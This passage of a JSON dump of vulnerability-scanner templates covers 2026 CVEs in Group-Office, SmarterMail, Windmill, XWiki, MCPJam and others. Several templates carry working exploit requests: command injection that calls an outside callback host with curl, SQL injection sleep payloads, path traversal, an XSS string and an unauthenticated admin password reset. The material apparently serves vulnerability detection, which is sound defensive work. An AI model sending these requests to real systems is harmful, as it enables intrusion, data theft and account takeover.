  epss-percentile: 0.77847\n    cwe-id: CWE-287\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: openbullet\n    product: openbullet2\n    fofa-query: title=\"Openbullet2WebClient\"\n  tags: cve,cve2026,openbullet2,auth-bypass,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /api/v1/info/server HTTP/1.1\n        Host: {{Hostname}}\n        X-Api-Key:\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"operatingSystem\\\"\", \"\\\"buildNumber\\\"\", \"\\\"currentWorkingDirectory\\\"\")'\n        condition: and\n# digest: 490a0046304402202c454aeeba23d89ae1e0784c592dcf818617eb3b0c6d091f018fc288e48d23a702203f08510539f63e4e24dba518b409742f2e0bd193983c3feea8b593f49054890e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-25555.yaml","vuln_id":"cve-2026-25555"},{"raw":"id: CVE-2026-25545\n\ninfo:\n  name: Astro SSR - Server-Side Request Forgery\n  author: ritikchaddha\n  severity: high\n  description: |\n    Astro before 5.17.3 and @astrojs/node before 9.5.4 are vulnerable to full-read SSRF due to improper Host header validation in error page rendering, allowing attackers to redirect requests and access internal resources.\n  impact: |\n    Full-read SSRF allowing access to internal services, cloud metadata endpoints (AWS/GCP/Azure IMDS), environment files, and any host reachable from the server.\n  remediation: |\n    Upgrade to astro >= 5.17.3 or @astrojs/node >= 9.5.4. The fix reads prerendered error files directly from disk and validates the Host: header the same way X-Forwarded-Host was already validated.\n  reference:\n    - https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g\n    - https://github.com/withastro/astro/pull/15473\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-25545\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n    cvss-score: 8.6\n    cve-id: CVE-2026-25545\n    epss-score: 0.01769\n    epss-percentile: 0.77139\n    cwe-id: CWE-918\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: astro\n    product: astro\n    shodan-query: http.component:\"Astro\"\n  tags: cve,cve2026,astro,ssrf\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/{{randstr}}\"\n    headers:\n      Host: \"oast.me\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"<html><head></head><body></body></html>\")'\n          - 'contains(header, \"X-Interactsh-Version\")'\n          - 'status_code == 404'\n        condition: and\n# digest: 4b0a00483046022100938115033bb3ddd5a596664ffdbe5993883462abb54cfab0df53ae0a72e0fbb8022100ce936eebd67c5b6ff8fa06f5e5c91d7aa4b02c52ae1d940271fe848407340de9:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-25545.yaml","vuln_id":"cve-2026-25545"},{"raw":"id: CVE-2026-25527\n\ninfo:\n  name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal\n  author: WRG-11\n  severity: medium\n  description: |\n    changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.\n  impact: |\n    Unauthenticated attackers can read local application source files, potentially exposing sensitive information.\n  remediation: |\n   Upgrade to version 0.53.2 or later.\n  reference:\n    - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-25527\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2026-25527\n    epss-score: 0.0092\n    epss-percentile: 0.58767\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dgtlmoon\n    product: changedetection.io\n    shodan-query: http.html:\"changedetection.io\"\n  tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure\n\nhttp:\n  - raw:\n      - |\n        GET /static/%2e%2e/flask_app.py HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"from changedetectionio\", \"def static_content(\")'\n          - 'contains(content_type, \"text/x-python\")'\n        condition: and\n# digest: 4a0a004730450220364060b9fcdb55d1b0a64856bc15f2a9a964c45a9f4be872738eb227094bcc6a022100e9bdde665458da7af929f704f562fa8a107684120882728820943ff824450676:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-25527.yaml","vuln_id":"cve-2026-25527"},{"raw":"id: CVE-2026-25512\n\ninfo:\n  name: Group-Office < 26.0.5 - Remote Code Execution\n  author: omarkurt\n  severity: critical\n  description: |\n    Group-Office before versions 6.8.150, 25.0.82, and 26.0.5 is vulnerable to remote code execution via OS command injection. The endpoint email/message/tnefAttachmentFromTempFile directly concatenates the user-controlled parameter tmp_file into an exec() call. By injecting shell metacharacters into tmp_file, an authenticated attacker can execute arbitrary system commands on the server.\n  impact: |\n    Successful exploitation allows an authenticated attacker to execute arbitrary system commands with web server privileges, potentially leading to full server compromise.\n  remediation: |\n    Update Group-Office to version 6.8.150, 25.0.82, or 26.0.5 or later. The fix applies escapeshellarg() to properly escape file paths before passing them to exec().\n  reference:\n    - https://github.com/Intermesh/groupoffice/security/advisories/GHSA-579w-jvg7-frr4\n    - https://github.com/Intermesh/groupoffice/commit/6c612deca97a6cd2a1bd4feea0ce7e8e9d907792\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-25512\n    - https://vulnerabletarget.com/VT-2026-25512\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2026-25512\n    cwe-id: CWE-78\n    epss-score: 0.18536\n    epss-percentile: 0.97122\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: intermesh\n    product: group-office\n    shodan-query: title:\"Group-Office\"\n    fofa-query: title=\"Group-Office\"\n  tags: cve,cve2026,groupoffice,rce,authenticated,oast\n\nvariables:\n  username: \"{{username}}\"\n  password: \"{{password}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /index.php?r=core/auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username={{username}}&password={{password}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"success\\\":true\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: security_token\n        part: body\n        group: 1\n        regex:\n          - '\"security_token\":\"([^\"]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        GET /index.php?r=email/message/tnefAttachmentFromTempFile&tmp_file=dummy.dat;curl+{{interactsh-url}};%23&security_token={{security_token}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(interactsh_protocol, \"dns\")'\n        condition: and\n# digest: 490a0046304402201e090d642927d4ce8bd09426de553530ba85cb4838f86d6ddc3444d61f52352902203a8eb9b270be7c2b66e69f6066050067d147a8e6108c5559a28b33c46c0e5362:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-25512.yaml","vuln_id":"cve-2026-25512"},{"raw":"id: CVE-2026-25231\n\ninfo:\n  name: FileRise <= 3.3.0 - Unauthenticated File Read\n  author: str4k3r\n  severity: high\n  description: |\n    FileRise <= 3.3.0 contains an unauthenticated file read vulnerability caused by a lack of access control on the /uploads directory, letting unauthenticated attackers access uploaded files directly, exploit requires knowledge or guessing of file paths.\n  impact: |\n    Unauthenticated attackers can access sensitive uploaded files, leading to data exposure and privacy breaches.\n  remediation: |\n    Upgrade to version 3.3.0 or later.\n  reference:\n    - https://github.com/error311/FileRise/security/advisories/GHSA-hv99-77cw-hvpr\n    - https://github.com/error311/FileRise\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cwe-id: CWE-284\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: error311\n    product: filerise\n    shodan-query: 'http.title:\"FileRise\"'\n    fofa-query: 'title=\"FileRise\"'\n    google-query: 'intitle:\"FileRise\"'\n  tags: cve,cve2026,filerise,exposure,file-read\n\nflow: http(1) && (http(2) || http(3))\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n    max-redirects: 2\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(to_lower(body), '<title>filerise')\"\n          - \"contains_any(body, 'api/auth/login_basic.php', 'js/main.js')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /uploads/README.md HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"len(body) > 0\"\n          - \"!contains(to_lower(content_type), 'text/html')\"\n          - \"!contains(to_lower(body), '<title')\"\n        condition: and\n\n  - raw:\n      - |\n        GET /uploads HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: false\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 301\"\n          - \"contains(header, '/uploads/')\"\n        condition: and\n# digest: 4a0a0047304502203235d67ccc8d63dea95f8cbb998c8bdd8928f240c489261879be0aeb95b5cd040221008180df9e479a5a14789b841833686ddaa0b77dde6740c56bb539bea23198c502:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-25231.yaml","vuln_id":"cve-2026-25231"},{"raw":"id: CVE-2026-24477\n\ninfo:\n  name: AnythingLLM - Information Disclosure\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attacker full read/write access to the Qdrant vector database instance used by AnythingLLM. Since Qdrant often stores the core knowledge base for RAG in AnythingLLM, this can lead to complete compromise of the semantic search / retrieval functionality and indirect leakage of confidential uploaded documents. Version 1.10.0 patches the issue.\n  impact: |\n    Unauthenticated attackers can read and write to the Qdrant database, compromising semantic search and leaking confidential documents.\n  remediation: |\n    Update to version 1.10.0 or later.\n  reference:\n    - https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-gm94-qc2p-xcwf\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-24477\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: \"anythingllm\"\n  tags: cve,cve2026,anything-llm,info-leak,api,vkev\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/api/setup-complete\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"QdrantApiKey\":'\n\n      - type: word\n        part: content_type\n        words:\n          - 'application/json'\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100ff5f7e88a5be9d740918721a4737d9e4a5faf7a068d2edda6076d0677b1d74e402210094533cdab3de7441c903bd07498fc94637f5418b8fabb235413b24a37930f57d:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-24477.yaml","vuln_id":"cve-2026-24477"},{"raw":"id: CVE-2026-24423\n\ninfo:\n  name: SmarterMail - Remote Code Execution\n  author: jyoti369\n  severity: critical\n  description: |\n    SmarterTools SmarterMail < build 9511 contains an unauthenticated remote code execution caused by malicious OS command execution via ConnectToHub API method, letting remote attackers execute arbitrary commands, exploit requires no authentication.\n  impact: |\n    Remote attackers can execute arbitrary OS commands, potentially leading to full system compromise.\n  remediation: |\n    Update to build 9511 or later.\n  reference:\n    - https://www.vulncheck.com/blog/smartermail-connecttohub-rce-cve-2026-24423\n    - https://code-white.com/public-vulnerability-list/\n    - https://www.smartertools.com/smartermail/release-notes/current\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-24423\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-24423\n    epss-score: 0.88177\n    epss-percentile: 0.99761\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"SmarterMail\"\n  tags: cve,cve2026,smartermail,rce,oast,kev,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/settings/sysadmin/connect-to-hub HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"hubAddress\":\"http://{{interactsh-url}}\",\"oneTimePassword\":\"{{randstr}}\",\"nodeName\":\"{{randstr}}\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        part: interactsh_request\n        words:\n          - \"setup-initial-connection\"\n# digest: 4a0a00473045022100f13dbe671ead2bb578255f2d13e62ffd0337ee9645596bfb055d52dd1ada8bff02201c42127139edae8e9a51f37116e5e293c4671a86e70f57e8aea30bde39ac8d77:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-24423.yaml","vuln_id":"cve-2026-24423"},{"raw":"id: CVE-2026-24207\n\ninfo:\n  name: NVIDIA Triton Inference Server <= 26.02 - Authentication Bypass\n  author: VixianSchool\n  severity: critical\n  description: |\n    NVIDIA Triton Inference Server contains an authentication bypass vulnerability, letting attackers bypass authentication and potentially execute code, escalate privileges, tamper data, cause denial of service, or disclose information, exploit requires no special conditions.\n  impact: |\n    Attackers can bypass authentication to execute code, escalate privileges, tamper data, cause denial of service, or disclose sensitive information.\n  remediation: |\n    Update to the latest version of NVIDIA Triton Inference Server.\n  reference:\n    - https://github.com/offseckit/CVE-2026-24207\n    - https://offseckit.com/blog/cve-2026-24207\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-24207\n    epss-score: 0.02552\n    epss-percentile: 0.84351\n    cwe-id: CWE-288\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: nvidia\n    product: triton-inference-server\n    shodan-query: 'http.title:\"Triton\" port:8080'\n  tags: cve,cve2026,nvidia,triton,auth-bypass,rce,ml,ai\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/models\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, '\\\"models\\\":[')\"\n          - \"!contains(body, 'This API is restricted')\"\n          - \"!contains(body, 'restricted')\"\n        condition: and\n# digest: 4a0a0047304502202395770a0de2b5923bd4ae2d5f43587548171a3abe76af461e566a36bb28feaf022100cbedc72096d54aac71cb227752421907bee84ea75dd79b1a888a9d84ce1d4a17:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-24207.yaml","vuln_id":"cve-2026-24207"},{"raw":"id: CVE-2026-2416\n\ninfo:\n  name: Geo Mashup <= 1.13.17 - SQL Injection\n  author: Shivam Kamboj\n  severity: high\n  description: |\n    Geo Mashup WordPress plugin <= 1.13.17 contains a SQL injection caused by insufficient escaping of the 'sort' parameter, letting unauthenticated attackers extract sensitive database information remotely.\n  impact: |\n    Unauthenticated attackers can extract sensitive database information, leading to data disclosure and potential further compromise.\n  remediation:\n    Update to the latest version beyond 1.13.17.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-mashup/geo-mashup-11317-unauthenticated-sql-injection-via-sort-parameter\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2416\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-2416\n    epss-score: 0.01392\n    epss-percentile: 0.71141\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,geo-mashup,unauth\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/geo-mashup/readme.txt\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - compare_versions(version, '<= 1.13.17')\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: version\n        group: 1\n        regex:\n          - 'Stable tag: ([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        @timeout: 30s\n        GET /wp-admin/admin-ajax.php?action=geo_mashup_query&output=json&sort=(SELECT(0)FROM(SELECT(SLEEP(8)))a) HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration >= 8'\n          - 'status_code == 200'\n          - 'contains(body, \"objects\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n# digest: 490a004630440220629d0e5660dd583e0f63e9a135d537b6ce75a34b8330cc10337616cb03a1e23b02202846617a8677f8f1273fb704a044876e4afebb83fc78df7afe6e8974774acba9:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-2416.yaml","vuln_id":"cve-2026-2416"},{"raw":"id: CVE-2026-2413\n\ninfo:\n  name: Ally – Web Accessibility & Usability <= 4.0.3 - SQL Injection\n  author: Shivam Kamboj\n  severity: high\n  description: |\n    The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to SQL Injection via the URL path in all versions up to, and including, 4.0.3. This is due to insufficient escaping on the user-supplied URL parameter in the `get_global_remediations()` method, where it is directly concatenated into an SQL JOIN clause without proper sanitization for SQL context. While `esc_url_raw()` is applied for URL safety, it does not prevent SQL metacharacters (single quotes, parentheses) from being injected. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via time-based blind SQL injection techniques. The Remediation module must be active, which requires the plugin to be connected to an Elementor account.\n  impact: |\n    Unauthenticated attackers can extract sensitive database information via blind SQL injection, risking data disclosure.\n  remediation: |\n    Update to a version later than 4.0.3 or the latest available version.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pojo-accessibility/ally-web-accessibility-usability-403-unauthenticated-sql-injection-via-url-path\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2413\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-2413\n    epss-score: 0.02331\n    epss-percentile: 0.82796\n  metadata:\n    max-request: 1\n    verified: true\n  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,pojo-accessibility,unauth\n\nhttp:\n  - raw:\n      - |\n        @timeout: 30s\n        GET /x'OR(EXP(~(SELECT*FROM(SELECT(SLEEP(8)))a)))OR'/ HTTP/1.1\n        Host: {{Hostname}}\n        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=8'\n          - 'status_code==404 || status_code==200'\n          - 'contains(body, \"registerAllyAction\")'\n        condition: and\n# digest: 4a0a00473045022100a16b235c7c73c6974070560ebf3dc22e6e8fc848685b08d9c514b85207dae42802203c52f843198d4abd0c0d83ade7e2edbd08d4bbf9a02e9c29424f2158e44b0e53:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-2413.yaml","vuln_id":"cve-2026-2413"},{"raw":"id: CVE-2026-24128\n\ninfo:\n  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting\n  author: ritikchaddha\n  severity: medium\n  description: |\n    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.\n  reference:\n    - https://jira.xwiki.org/browse/XWIKI-23462\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2026-24128\n    epss-score: 0.00559\n    epss-percentile: 0.45384\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: XWiki\n    product: xwiki-platform-distribution-flavor-main\n    shodan-query: html:\"data-xwiki-reference\"\n  tags: cve,cve2026,xwiki,xss\n\nhttp:\n  - raw:\n      - |\n        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<img src=a onerror=alert(document.domain)>\"\n          - \"xwiki.extension.job\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - text/html\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200642b549fb44ba9bdea60fbb3ccb49c638e2512b9ebb2a7371142e1b81693004022100f15de030112ce04380f9a14f6e04b4bced4b53eb2cb17ecdc30a6edcf7f64d84:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-24128.yaml","vuln_id":"cve-2026-24128"},{"raw":"id: CVE-2026-23760\n\ninfo:\n  name: SmarterTools SmarterMail - Admin Password Reset\n  author: watchTowr,DhiyaneshDk\n  severity: critical\n  description: |\n    Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.\n  impact: |\n    Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.\n  remediation: |\n    Upgrade to build 9511 or later.\n  reference:\n    - https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"SmarterMail\"\n  tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev,vuln\n\nvariables:\n  password: \"{{rand_text_alphanumeric(12)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/auth/force-reset-password HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"IsSysAdmin\":\"true\",\n        \"OldPassword\":\"watever\",\n        \"Username\":\"admin\",\n        \"NewPassword\":\"{{password}}\",\n        \"ConfirmPassword\": \"{{password}}\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n          - 'debugInfo'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: dsl\n        dsl:\n          - '\"New Password: \" + password'\n# digest: 4b0a004830460221008ca8dc2972b90c7a0a4e70637d962755ce5c8c96aa9cc6b8d3479f2dfa17499b022100aa2bf5a5357ff83f5e4df8bd47d8f410a9cd51a66269c4920b25dbcc56199228:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-23760.yaml","vuln_id":"cve-2026-23760"},{"raw":"id: CVE-2026-23744\n\ninfo:\n  name: MCPJam Inspector - Remote Code Execution\n  author: Louay-075\n  severity: critical\n  description: |\n    MCPJam inspector is the local-first development platform for MCP servers. The Latest version 1.4.2 and earlier are vulnerable to a remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.\n  impact: |\n    An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host.\n  remediation: |\n    Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1.\n  reference:\n    - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6\n    - https://github.com/advisories/GHSA-232v-j27c-5pp6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23744\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-23744\n    epss-score: 0.64842\n    epss-percentile: 0.9921\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: mcpjam\n    product: mcpjam\n  tags: cve,cve2026,rce,mcpjam,oast,ai,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /api/mcp/connect HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"serverConfig\":{\"timeout\":10000,\"command\":\"curl\",\"args\":[\"{{interactsh-url}}\"],\"env\":{}},\"serverId\":\"mymcp\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"Connection failed for server\", \"MCP error\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'status_code == 500'\n        condition: and\n# digest: 4a0a00473045022100fc909aa1d9b8478d2f5ce305bda15ef63c11cc3a0be03240181b593d08520aa5022041eee44b9b5f686abcd3b23023a321fb13c20f546557ea929a61411f6d617914:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-23744.yaml","vuln_id":"cve-2026-23744"},{"raw":"id: CVE-2026-23696\n\ninfo:\n  name: Windmill < 1.603.3 - SQL Injection\n  author: chocapikk,DhiyaneshDk\n  severity: critical\n  description: |\n    Windmill versions 1.276.0 through 1.603.2 contain an authenticated SQL injection vulnerability in the folder owner management endpoint. The addowner API endpoint passes user-supplied input directly into a SQL query without sanitization, enabling JSONB path injection. An authenticated user with operator-level access can extract sensitive data including JWT secrets, password hashes, API tokens, and database credentials, leading to full privilege escalation and remote code execution.\n  impact: |\n    An attacker with any valid Windmill credentials (including operator accounts) can extract the JWT signing secret from the database, forge an admin token, escalate to super admin privileges, and execute arbitrary commands on the server.\n  remediation: |\n    Update Windmill to version 1.603.3 or later which sanitizes the owner input before SQL query construction.\n  reference:\n    - https://github.com/Chocapikk/Windfall\n    - https://github.com/windmill-labs/windmill/commit/942fb629210ebb287f48467d1535ffde3a3eeafe\n    - https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-23696\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 9.9\n    cve-id: CVE-2026-23696\n    epss-score: 0.13582\n    epss-percentile: 0.96286\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: windmill-labs\n    product: windmill\n  tags: cve,cve2026,windmill,sqli,authenticated\n\nvariables:\n  folder: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: |\n  http(\"list-workspaces\") && http(\"create-folder\") && http(\"sqli-inject\") && http(\"read-folder\") && http(\"cleanup\")\n\nhttp:\n  - id: list-workspaces\n    raw:\n      - |\n        GET /api/workspaces/list HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n    extractors:\n      - type: regex\n        name: workspace\n        part: body\n        group: 1\n        regex:\n          - '\"id\"\\s*:\\s*\"([^\"]+)\"'\n        internal: true\n\n  - id: create-folder\n    raw:\n      - |\n        POST /api/w/{{workspace}}/folders/create HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n        {\"name\":\"{{folder}}\"}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Created folder\"\n        internal: true\n\n  - id: sqli-inject\n    raw:\n      - |\n        POST /api/w/{{workspace}}/folders/addowner/{{folder}} HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n        {\"owner\":\"x\\\"}',(SELECT to_jsonb(11*11*11)),true)--\"}\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - id: read-folder\n    raw:\n      - |\n        GET /api/w/{{workspace}}/folders/get/{{folder}} HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"x\":1331'\n\n      - type: status\n        status:\n          - 200\n\n  - id: cleanup\n    raw:\n      - |\n        DELETE /api/w/{{workspace}}/folders/delete/{{folder}} HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer {{token}}\n        Content-Type: application/json\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n# digest: 4a0a0047304502210092f63350040c8a34619f1d4e8ae3e572e12b859c84579dd9a14d48c7ea45aa9702205c1d8becac1dcba3351ed56037a420389b4cfbe987fed44cb8f4b165198dc95b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-23696.yaml","vuln_id":"cve-2026-23696"},{"raw":"id: CVE-2026-23693\n\ninfo:\n  name: ElementsKit Lite <3.7.9 - Unauthenticated Mailchimp Proxy\n  author: rahulreddykarne\n  severity: high\n  description: |\n    The ElementsKit Elementor Addons Lite 